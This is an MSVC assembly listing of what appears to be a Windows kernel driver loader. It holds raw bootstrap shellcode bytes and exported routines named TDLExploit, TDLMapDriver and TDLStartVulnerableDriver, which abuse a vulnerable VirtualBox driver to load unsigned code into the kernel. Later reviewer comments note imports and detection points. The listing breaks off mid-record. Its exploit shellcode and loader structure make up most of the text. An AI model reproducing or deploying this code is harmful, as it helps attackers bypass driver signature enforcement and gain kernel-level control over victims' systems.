; Listing generated by Microsoft (R) Optimizing Compiler Version 19.28.29335.0 include listing.inc INCLUDELIB LIBCMT INCLUDELIB OLDNAMES PUBLIC TDLBootstrapLoader_code PUBLIC g_lApplicationInstances PUBLIC g_hVBox PUBLIC g_VBoxInstalled PUBLIC g_NtBuildNumber _DATA SEGMENT COMM g_hInstance:QWORD _DATA ENDS _BSS SEGMENT g_VBoxInstalled DD 01H DUP (?) g_NtBuildNumber DD 01H DUP (?) _BSS ENDS _DATA SEGMENT g_hVBox DQ ffffffffffffffffH _DATA ENDS shrd SEGMENT g_lApplicationInstances DD 00H shrd ENDS CONST SEGMENT TDLBootstrapLoader_code DB 048H DB 08bH DB 0c4H DB 041H DB 054H DB 048H DB 081H DB 0ecH DB 090H DB 00H DB 00H DB 00H DB 048H DB 089H DB 058H DB 010H DB 04dH DB 08bH DB 0e0H DB 048H DB 089H DB 068H DB 018H DB 048H DB 08dH DB 01dH DB 0e2H DB 0ffH DB 0ffH DB 0ffH DB 04cH DB 089H DB 068H DB 0e8H DB 048H DB 081H DB 0c3H DB 00H DB 03H DB 00H DB 00H DB 04cH DB 089H DB 070H DB 0e0H DB 04cH DB 08bH DB 0eaH DB 04cH DB 089H DB 078H DB 0d8H DB 04cH DB 08bH DB 0c9H DB 033H DB 0c9H DB 041H DB 0b8H DB 054H DB 064H DB 06cH DB 053H DB 04cH DB 063H DB 073H DB 03cH DB 04cH DB 03H DB 0f3H DB 045H DB 08bH DB 07eH DB 050H DB 041H DB 08dH DB 097H DB 00H DB 010H DB 00H DB 00H DB 041H DB 0ffH DB 0d1H DB 045H DB 033H DB 0c9H DB 048H DB 08dH DB 0a8H DB 00H DB 010H DB 00H DB 00H DB 048H DB 081H DB 0e5H DB 00H DB 0f0H DB 0ffH DB 0ffH DB 041H DB 083H DB 0beH DB 084H DB 00H DB 00H DB 00H DB 05H DB 0fH DB 086H DB 0b0H DB 00H DB 00H DB 00H DB 041H DB 08bH DB 08eH DB 0b0H DB 00H DB 00H DB 00H DB 085H DB 0c9H DB 0fH DB 084H DB 0a1H DB 00H DB 00H DB 00H DB 048H DB 089H DB 0b4H DB 024H DB 0b8H DB 00H DB 00H DB 00H DB 04cH DB 08dH DB 04H DB 0bH DB 041H DB 08bH DB 0b6H DB 0b4H DB 00H DB 00H DB 00H DB 04cH DB 08bH DB 0ddH DB 04dH DB 02bH DB 05eH DB 030H DB 048H DB 089H DB 0bcH DB 024H DB 088H DB 00H DB 00H DB 00H DB 041H DB 08bH DB 0f9H DB 085H DB 0f6H DB 074H DB 068H DB 0fH DB 01fH DB 044H DB 00H DB 00H DB 041H DB 0b9H DB 08H DB 00H DB 00H DB 00H DB 04dH DB 08dH DB 050H DB 08H DB 045H DB 039H DB 
048H DB 04H DB 076H DB 043H DB 041H DB 0fH DB 0b7H DB 02H DB 08bH DB 0c8H DB 0c1H DB 0e9H DB 0cH DB 083H DB 0f9H DB 03H DB 074H DB 017H DB 083H DB 0f9H DB 0aH DB 075H DB 022H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 04cH DB 01H DB 01cH DB 0aH DB 0ebH DB 010H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 044H DB 01H DB 01cH DB 0aH DB 049H DB 083H DB 0c2H DB 02H DB 041H DB 083H DB 0c1H DB 02H DB 045H DB 03bH DB 048H DB 04H DB 072H DB 0bdH DB 041H DB 08bH DB 040H DB 04H DB 03H DB 0f8H DB 04cH DB 03H DB 0c0H DB 03bH DB 0feH DB 072H DB 0a0H DB 045H DB 033H DB 0c9H DB 048H DB 08bH DB 0b4H DB 024H DB 0b8H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 0bcH DB 024H DB 088H DB 00H DB 00H DB 00H DB 049H DB 08bH DB 0d7H DB 04cH DB 08bH DB 07cH DB 024H DB 070H DB 048H DB 0c1H DB 0eaH DB 03H DB 048H DB 085H DB 0d2H DB 074H DB 01dH DB 048H DB 08bH DB 0cdH DB 048H DB 02bH DB 0ddH DB 066H DB 0fH DB 01fH DB 044H DB 00H DB 00H DB 048H DB 08bH DB 04H DB 0bH DB 048H DB 089H DB 01H DB 048H DB 08dH DB 049H DB 08H DB 048H DB 083H DB 0eaH DB 01H DB 075H DB 0efH DB 04cH DB 089H DB 04cH DB 024H DB 030H DB 04cH DB 08dH DB 044H DB 024H DB 040H DB 04cH DB 089H DB 08cH DB 024H DB 0a0H DB 00H DB 00H DB 00H DB 048H DB 08dH DB 08cH DB 024H DB 0a0H DB 00H DB 00H DB 00H DB 04cH DB 089H DB 04cH DB 024H DB 048H DB 0fH DB 057H DB 0c0H DB 04cH DB 089H DB 04cH DB 024H DB 050H DB 0baH DB 0ffH DB 0ffH DB 01fH DB 00H DB 0f3H DB 0fH DB 07fH DB 044H DB 024H DB 060H DB 0c7H DB 044H DB 024H DB 040H DB 030H DB 00H DB 00H DB 00H DB 0c7H DB 044H DB 024H DB 058H DB 00H DB 02H DB 00H DB 00H DB 041H DB 08bH DB 046H DB 028H DB 048H DB 03H DB 0c5H DB 048H DB 089H DB 044H DB 024H DB 028H DB 04cH DB 089H DB 04cH DB 024H DB 020H DB 045H DB 033H DB 0c9H DB 041H DB 0ffH DB 0d5H DB 04cH DB 08bH DB 074H DB 024H DB 078H DB 04cH DB 08bH DB 0acH DB 024H DB 080H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 0acH DB 024H DB 0b0H DB 00H DB 00H 
DB 00H DB 048H DB 08bH DB 09cH DB 024H DB 0a8H DB 00H DB 00H DB 00H DB 085H DB 0c0H DB 078H DB 0bH DB 048H DB 08bH DB 08cH DB 024H DB 0a0H DB 00H DB 00H DB 00H DB 041H DB 0ffH DB 0d4H DB 048H DB 081H DB 0c4H DB 090H DB 00H DB 00H DB 00H DB 041H DB 05cH DB 0c3H TDLBootstrapLoader_code_w10rs2 DB 040H DB 053H DB 055H DB 056H DB 048H DB 083H DB 0ecH DB 020H DB 04cH DB 08bH DB 0c9H DB 04cH DB 089H DB 07cH DB 024H DB 050H DB 048H DB 08dH DB 01dH DB 0e9H DB 0ffH DB 0ffH DB 0ffH DB 033H DB 0c9H DB 048H DB 081H DB 0c3H DB 00H DB 03H DB 00H DB 00H DB 041H DB 0b8H DB 054H DB 064H DB 06cH DB 053H DB 048H DB 063H DB 06bH DB 03cH DB 048H DB 03H DB 0ebH DB 044H DB 08bH DB 07dH DB 050H DB 041H DB 08dH DB 097H DB 00H DB 010H DB 00H DB 00H DB 041H DB 0ffH DB 0d1H DB 048H DB 08dH DB 0b0H DB 00H DB 010H DB 00H DB 00H DB 048H DB 081H DB 0e6H DB 00H DB 0f0H DB 0ffH DB 0ffH DB 083H DB 0bdH DB 084H DB 00H DB 00H DB 00H DB 05H DB 0fH DB 086H DB 0a5H DB 00H DB 00H DB 00H DB 08bH DB 08dH DB 0b0H DB 00H DB 00H DB 00H DB 085H DB 0c9H DB 0fH DB 084H DB 097H DB 00H DB 00H DB 00H DB 048H DB 089H DB 07cH DB 024H DB 040H DB 04cH DB 08dH DB 04H DB 0bH DB 04cH DB 08bH DB 0deH DB 04cH DB 089H DB 074H DB 024H DB 048H DB 04cH DB 02bH DB 05dH DB 030H DB 033H DB 0ffH DB 044H DB 08bH DB 0b5H DB 0b4H DB 00H DB 00H DB 00H DB 045H DB 085H DB 0f6H DB 074H DB 06aH DB 066H DB 0fH DB 01fH DB 084H DB 00H DB 00H DB 00H DB 00H DB 00H DB 041H DB 0b9H DB 08H DB 00H DB 00H DB 00H DB 04dH DB 08dH DB 050H DB 08H DB 045H DB 039H DB 048H DB 04H DB 076H DB 043H DB 041H DB 0fH DB 0b7H DB 02H DB 08bH DB 0c8H DB 0c1H DB 0e9H DB 0cH DB 083H DB 0f9H DB 03H DB 074H DB 017H DB 083H DB 0f9H DB 0aH DB 075H DB 022H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 04cH DB 01H DB 01cH DB 0aH DB 0ebH DB 010H DB 041H DB 08bH DB 010H DB 025H DB 0ffH DB 0fH DB 00H DB 00H DB 048H DB 08dH DB 0cH DB 03H DB 044H DB 01H DB 01cH DB 0aH DB 049H DB 083H DB 0c2H DB 02H DB 041H DB 083H DB 0c1H DB 02H DB 
045H DB 03bH DB 048H DB 04H DB 072H DB 0bdH DB 041H DB 08bH DB 040H DB 04H DB 03H DB 0f8H DB 04cH DB 03H DB 0c0H DB 041H DB 03bH DB 0feH DB 072H DB 09fH DB 048H DB 08bH DB 07cH DB 024H DB 040H DB 04cH DB 08bH DB 074H DB 024H DB 048H DB 049H DB 08bH DB 0d7H DB 04cH DB 08bH DB 07cH DB 024H DB 050H DB 048H DB 0c1H DB 0eaH DB 03H DB 048H DB 085H DB 0d2H DB 074H DB 025H DB 048H DB 08bH DB 0ceH DB 048H DB 02bH DB 0deH DB 0fH DB 01fH DB 040H DB 00H DB 066H DB 066H DB 0fH DB 01fH DB 084H DB 00H DB 00H DB 00H DB 00H DB 00H DB 048H DB 08bH DB 04H DB 0bH DB 048H DB 089H DB 01H DB 048H DB 08dH DB 049H DB 08H DB 048H DB 083H DB 0eaH DB 01H DB 075H DB 0efH DB 08bH DB 045H DB 028H DB 048H DB 03H DB 0c6H DB 048H DB 083H DB 0c4H DB 020H DB 05eH DB 05dH DB 05bH DB 048H DB 0ffH DB 0e0H CONST ENDS PUBLIC TDLVBoxInstalled PUBLIC TDLGetProcAddress PUBLIC TDLResolveKernelImport PUBLIC TDLExploit PUBLIC TDLMapDriver PUBLIC TDLStartVulnerableDriver PUBLIC TDLStopVulnerableDriver PUBLIC TDLProcessCommandLine PUBLIC TDLMain PUBLIC ??_C@_1DG@IHFEMIJJ@?$AAS?$AAo?$AAf?$AAt?$AAw?$AAa?$AAr?$AAe?$AA?2?$AAO?$AAr?$AAa?$AAc?$AAl?$AAe@ ; `string' PUBLIC ??_C@_0BA@FMLBJMJD@The?5Magic?5Word?$CB@ ; `string' PUBLIC ??_C@_1EE@GCOPAAPI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_08EFILHJLF@furutaka@ ; `string' PUBLIC ??_C@_1EI@FJDONFON@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1EI@CGOGKFDE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAp?$AAe?$AAn?$AAL?$AAd?$AAr?$AA?4?$AAu?$AA?4@ ; `string' PUBLIC ??_C@_1EI@INCHPAGN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1HE@JFOLDMOA@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1BI@BLMPOKEB@?$AA?0?$AA?5?$AAs?$AAi?$AAz?$AAe?$AA?5?$AA?$DN?$AA?5?$AA0?$AAx@ ; `string' PUBLIC 
??_C@_1DK@EPAAGPAO@?$AA?$AN?$AA?6?$AA?7?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAi?$AAm?$AAa?$AAg?$AAe@ ; `string' PUBLIC ??_C@_1FG@OEMDNKOC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1FK@MDOKEACB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1DG@HDAIEBIB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1DA@HAFJFEII@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAU?$AAP?$AA_?$AAI?$AAO?$AAC?$AAT?$AAL?$AA_@ ; `string' PUBLIC ??_C@_1CM@NLNMPOEI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAK?$AAe?$AAr?$AAn?$AAe?$AAl?$AA?5?$AAb?$AAa?$AAs@ ; `string' PUBLIC ??_C@_1FG@JJGLGCIM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1EI@DFMENCDB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAd?$AAr?$AAi?$AAv@ ; `string' PUBLIC ??_C@_1DE@NBFCBKFB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAL?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5?$AAn?$AAt@ ; `string' PUBLIC ??_C@_1BK@ELHOPPAM@?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe?$AAx?$AAe@ ; `string' PUBLIC ??_C@_1EM@IPLJLOBG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1DO@JMKKLPKI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAn?$AAt?$AAo?$AAs?$AAk?$AAr?$AAn?$AAl?$AA?4?$AAe@ ; `string' PUBLIC ??_C@_0BG@HPOEIOMD@ExAllocatePoolWithTag@ ; `string' PUBLIC ??_C@_1GI@FJBFMIKD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAE?$AAx?$AAA@ ; `string' PUBLIC ??_C@_1DM@IOMLEMBJ@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAA?$AAl?$AAl?$AAo?$AAc?$AAa?$AAt?$AAe@ ; `string' PUBLIC ??_C@_0BF@OLMDGEDM@PsCreateSystemThread@ ; `string' PUBLIC ??_C@_1GG@IKDOMIFP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAP?$AAs?$AAC@ ; `string' PUBLIC ??_C@_1DK@GFPNMFM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAP?$AAs?$AAC?$AAr?$AAe?$AAa?$AAt?$AAe?$AAS?$AAy@ ; `string' PUBLIC ??_C@_07IPICGNAN@ZwClose@ ; 
`string' PUBLIC ??_C@_1EM@PICGLNPB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAZ?$AAw?$AAC@ ; `string' PUBLIC ??_C@_1CA@CIMCEDAI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAZ?$AAw?$AAC?$AAl?$AAo?$AAs?$AAe?$AA?5?$AA0?$AAx@ ; `string' PUBLIC ??_C@_1FC@FLNAPHOH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?0?$AA?5?$AAu?$AAn?$AAa@ ; `string' PUBLIC ??_C@_1DO@CJICDMJP@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAS?$AAh?$AAe?$AAl?$AAl?$AAc?$AAo?$AAd?$AAe?$AA?5@ ; `string' PUBLIC ??_C@_1FE@IBOBMBO@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAf?$AAa?$AAu?$AAl?$AAt?$AA?5?$AAb?$AAo@ ; `string' PUBLIC ??_C@_1GE@DNGFNKBK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AA1?$AA0@ ; `string' PUBLIC ??_C@_1DK@DFOOLLG@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAR?$AAe?$AAs?$AAo?$AAl?$AAv?$AAi?$AAn?$AAg?$AA?5@ ; `string' PUBLIC ??_C@_1CO@PHLCFHAC@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAx?$AAe?$AAc?$AAu?$AAt?$AAi?$AAn?$AAg?$AA?5@ ; `string' PUBLIC ??_C@_1IA@JHBCJNPH@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAl?$AAo?$AAa?$AAd@ ; `string' PUBLIC ??_C@_1EA@CCBNBOB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAo?$AAp?$AAe?$AAn@ ; `string' PUBLIC ??_C@_1BA@DCGKIPPO@?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr?$AAv@ ; `string' PUBLIC ??_C@_1BA@CCLAPIHO@?$AA?2?$AAD?$AAe?$AAv?$AAi?$AAc?$AAe@ ; `string' PUBLIC ??_C@_1JC@BFFFCFPE@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAA?$AAc?$AAt?$AAi?$AAv?$AAe?$AA?5?$AAV?$AAi?$AAr@ ; `string' PUBLIC ??_C@_1BG@OGKIPLPP@?$AAV?$AAB?$AAo?$AAx?$AAU?$AAS?$AAB?$AAM?$AAo?$AAn@ ; `string' PUBLIC ??_C@_1GA@EGOCKGIF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1BG@NMHFFIMF@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAA?$AAd?$AAp@ ; `string' PUBLIC ??_C@_1GA@LHPDJMJC@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1BG@LHEADFGC@?$AAV?$AAB?$AAo?$AAx?$AAN?$AAe?$AAt?$AAL?$AAw?$AAf@ ; `string' PUBLIC 
??_C@_1GA@GBNHFGF@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1FK@PPBPJHOO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAs?$AAt?$AAo?$AAp@ ; `string' PUBLIC ??_C@_1GA@MAPIMDHK@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAh?$AAi?$AAl@ ; `string' PUBLIC ??_C@_1EG@BNHCAMNI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAV?$AAi?$AAr?$AAt?$AAu?$AAa?$AAl?$AAB?$AAo?$AAx@ ; `string' PUBLIC ??_C@_1CK@EAKAPGOF@?$AA?2?$AAd?$AAr?$AAi?$AAv?$AAe?$AAr?$AAs?$AA?2?$AAV?$AAB?$AAo?$AAx?$AAD?$AAr@ ; `string' PUBLIC ??_C@_1EM@JFFPOLPF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAw?$AAr?$AAi?$AAt@ ; `string' PUBLIC ??_C@_1FC@KOAIOCA@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1EA@LLGDEEI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAd?$AAe?$AAv@ ; `string' PUBLIC ??_C@_1EI@IPNBHDCN@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1EC@PNBIDKPH@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAl?$AAo?$AAa?$AAd?$AAi?$AAn?$AAg?$AA?5@ ; `string' PUBLIC ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@ ; `string' PUBLIC ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string' PUBLIC ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string' PUBLIC ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ ; `string' PUBLIC ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string' PUBLIC ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ ; `string' PUBLIC ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ ; `string' PUBLIC 
??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string'
; The symbol above completes a PUBLIC statement whose keyword sits at the end of the
; previous listing line.
;
; This stretch of the compiler listing contains, in order:
;   1. the tail of the PUBLIC list for string-literal labels,
;   2. the EXTRN (external symbol) declarations of the translation unit,
;   3. the x64 .pdata records for its functions,
;   4. the first wide-string constants.
; Labels starting with ??_C@_1 are MSVC-generated names for wide (UTF-16) string
; literals; the readable fragment inside each name is the start of the literal's text.
PUBLIC ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ ; `string'
PUBLIC ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string'
PUBLIC ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ ; `string'
PUBLIC ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ ; `string'
PUBLIC ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string'
PUBLIC ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string'
PUBLIC ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ ; `string'
PUBLIC ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ ; `string'
PUBLIC ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ ; `string'
PUBLIC ??_C@_13JOFGPIOO@?$AA?4@ ; `string'
PUBLIC ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ ; `string'
PUBLIC ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ ; `string'

; ---------------------------------------------------------------------------
; External references.
; Names with the __imp_ prefix are import-address-table slots (MSVC convention),
; i.e. functions reached through DLL imports.
; NOTE(review): read defensively, this import set outlines what the linked program
; can touch: the service control manager (OpenSCManagerW / CloseServiceHandle),
; a device object (DeviceIoControl), the registry (RegOpenKeyExW), dynamic module
; and export lookup (LdrLoadDll / LdrGetProcedureAddress), and native-API memory
; and file operations (NtAllocateVirtualMemory, NtFreeVirtualMemory, NtDeleteFile).
; ---------------------------------------------------------------------------
EXTRN __imp_GetCommandLineW:PROC
EXTRN __imp_GetFileAttributesW:PROC
EXTRN __imp_CloseHandle:PROC
EXTRN __imp_DeviceIoControl:PROC
EXTRN __imp_Sleep:PROC
EXTRN __imp_ExitProcess:PROC
EXTRN __imp_GetSystemDirectoryW:PROC
EXTRN __imp_GetModuleHandleW:PROC
EXTRN __imp_SetConsoleTitleW:PROC
EXTRN __imp_RegCloseKey:PROC
EXTRN __imp_RegOpenKeyExW:PROC
EXTRN __imp_CloseServiceHandle:PROC
EXTRN __imp_OpenSCManagerW:PROC
EXTRN __imp_LdrGetProcedureAddress:PROC
EXTRN __imp_LdrLoadDll:PROC
EXTRN __imp_RtlInitString:PROC
EXTRN __imp_RtlInitUnicodeString:PROC
EXTRN __imp_RtlGetVersion:PROC
EXTRN __imp_RtlImageNtHeader:PROC
EXTRN __imp_NtDeleteFile:PROC
EXTRN __imp_NtAllocateVirtualMemory:PROC
EXTRN __imp_NtFreeVirtualMemory:PROC
; The remaining externals carry no __imp_ prefix, so they are resolved at link time
; rather than through the import table - presumably from other objects of the same
; project (string helpers, sup* support routines, cui* console output, scm* service
; helpers); confirm against the project sources.
EXTRN _strend_w:PROC
EXTRN _strcpy_w:PROC
EXTRN _strcat_w:PROC
EXTRN ultostr_w:PROC
EXTRN ultohex_w:PROC
EXTRN u64tohex_w:PROC
EXTRN GetCommandLineParamW:PROC
EXTRN supGetNtOsBase:PROC
EXTRN supQueryResourceData:PROC
EXTRN supBackupVBoxDrv:PROC
EXTRN supWriteBufferToFile:PROC
EXTRN supIsObjectExists:PROC
EXTRN supStopVBoxService:PROC
EXTRN cuiInitialize:PROC
EXTRN cuiPrintTextW:PROC
; NOTE(review): going by their names, the scm* helpers install, start, open, stop
; and remove a driver service. Service creation and removal for a kernel driver are
; events a host sensor can log, so they are the natural detection points for this
; code path.
EXTRN scmInstallDriver:PROC
EXTRN scmStartDriver:PROC
EXTRN scmOpenDevice:PROC
EXTRN scmStopDriver:PROC
EXTRN scmRemoveDriver:PROC
EXTRN memcpy:PROC

; ---------------------------------------------------------------------------
; x64 exception-directory (.pdata) records, one COMDAT per function.
; Each record is three image-relative DWORDs: function start, function end and the
; function's unwind data. The "+N" on the second DWORD is therefore the length of
; the function's code in bytes (e.g. 1671 for TDLMapDriver, 1256 for TDLExploit).
; ---------------------------------------------------------------------------
; COMDAT pdata
pdata SEGMENT
$pdata$RtlSecureZeroMemory DD imagerel $LN4
    DD imagerel $LN4+27
    DD imagerel $unwind$RtlSecureZeroMemory
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLVBoxInstalled DD imagerel $LN5
    DD imagerel $LN5+83
    DD imagerel $unwind$TDLVBoxInstalled
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLGetProcAddress DD imagerel $LN5
    DD imagerel $LN5+88
    DD imagerel $unwind$TDLGetProcAddress
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLResolveKernelImport DD imagerel $LN19
    DD imagerel $LN19+167
    DD imagerel $unwind$TDLResolveKernelImport
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLExploit DD imagerel $LN26
    DD imagerel $LN26+1256
    DD imagerel $unwind$TDLExploit
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLMapDriver DD imagerel $LN35
    DD imagerel $LN35+1671
    DD imagerel $unwind$TDLMapDriver
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLStartVulnerableDriver DD imagerel $LN28
    DD imagerel $LN28+590
    DD imagerel $unwind$TDLStartVulnerableDriver
pdata ENDS
; COMDAT pdata
pdata SEGMENT
$pdata$TDLStopVulnerableDriver DD imagerel $LN16
    DD imagerel $LN16+353
